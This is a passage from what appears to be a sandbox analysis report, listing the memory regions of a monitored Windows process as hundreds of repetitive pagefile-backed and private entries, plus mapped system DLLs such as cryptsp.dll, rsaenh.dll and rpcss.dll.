"pagefile_0x00000000003d0000" filename = "" Region: id = 6993 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 6994 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 6995 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 6996 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 6997 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 6998 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 6999 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7000 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7001 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7002 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7003 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7004 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7005 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7006 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7007 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7008 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7009 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7010 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7011 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7018 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7019 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7020 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7021 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7022 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7023 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7024 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7025 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7026 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7027 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7028 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7029 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7030 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7031 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7032 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7033 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7034 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7035 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7036 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7037 start_va = 0x3d0000 end_va = 
0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7038 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7039 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7040 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7041 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7170 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 7171 start_va = 0x17e0000 end_va = 0x1beffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000017e0000" filename = "" Region: id = 7172 start_va = 0x1bf0000 end_va = 0x1ffffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 7173 start_va = 0x3e0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 7174 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7175 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7176 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7177 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7178 start_va = 
0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7179 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7180 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7181 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7182 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7183 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7184 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7185 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7186 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7187 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7188 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7189 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7190 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 
7191 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7192 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7193 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7194 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7195 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7196 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7197 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7198 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7199 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7200 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7201 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7202 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7203 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = 
"" Region: id = 7204 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7205 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7206 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7207 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7208 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7209 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7210 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7275 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7276 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7277 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7278 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7279 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7280 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000003d0000" filename = "" Region: id = 7281 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7282 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7283 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7284 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7285 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7286 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7287 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7288 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7289 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7290 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7291 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7292 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7293 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7294 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7295 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7296 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7297 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7355 start_va = 0x1370000 end_va = 0x14affff entry_point = 0x0 region_type = private name = "private_0x0000000001370000" filename = "" Region: id = 7356 start_va = 0x14d0000 end_va = 0x150ffff entry_point = 0x0 region_type = private name = "private_0x00000000014d0000" filename = "" Region: id = 7485 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 7486 start_va = 0x17e0000 end_va = 0x1beffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000017e0000" filename = "" Region: id = 7487 start_va = 0x1bf0000 end_va = 0x1ffffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 7488 start_va = 0x3e0000 end_va = 0x3f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 7489 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7490 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7491 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7492 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7493 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7494 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7495 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7496 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7497 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7498 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7499 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7500 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7501 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7502 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7503 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7504 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7505 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7506 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7507 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7508 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7509 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7510 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7511 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7512 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7532 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7533 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7534 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7535 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7536 start_va = 0x3d0000 end_va = 
0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7537 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7538 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7539 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7540 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7541 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7542 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7543 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7544 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7545 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7546 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7547 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7548 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7549 start_va = 
0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7550 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7551 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7552 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7553 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7554 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7555 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7556 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7557 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7558 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7559 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7560 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7561 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 
7562 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7563 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7564 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7565 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7566 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7567 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7568 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7569 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7570 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7630 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 7678 start_va = 0x17e0000 end_va = 0x181bfff entry_point = 0x17e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 7704 start_va = 0x17e0000 end_va = 0x181bfff entry_point = 0x17e0000 region_type = mapped_file name = "rsaenh.dll" filename = 
"\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 7705 start_va = 0x17e0000 end_va = 0x181bfff entry_point = 0x17e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 7706 start_va = 0x17e0000 end_va = 0x181bfff entry_point = 0x17e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 7707 start_va = 0x17e0000 end_va = 0x181bfff entry_point = 0x17e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 7708 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 7709 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 7776 start_va = 0x3d0000 end_va = 0x3d6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7777 start_va = 0x3e0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 7778 start_va = 0x17e0000 end_va = 0x189ffff entry_point = 0x17e0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 9689 start_va = 0x18a0000 end_va = 0x18fbfff entry_point = 0x18a0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: 
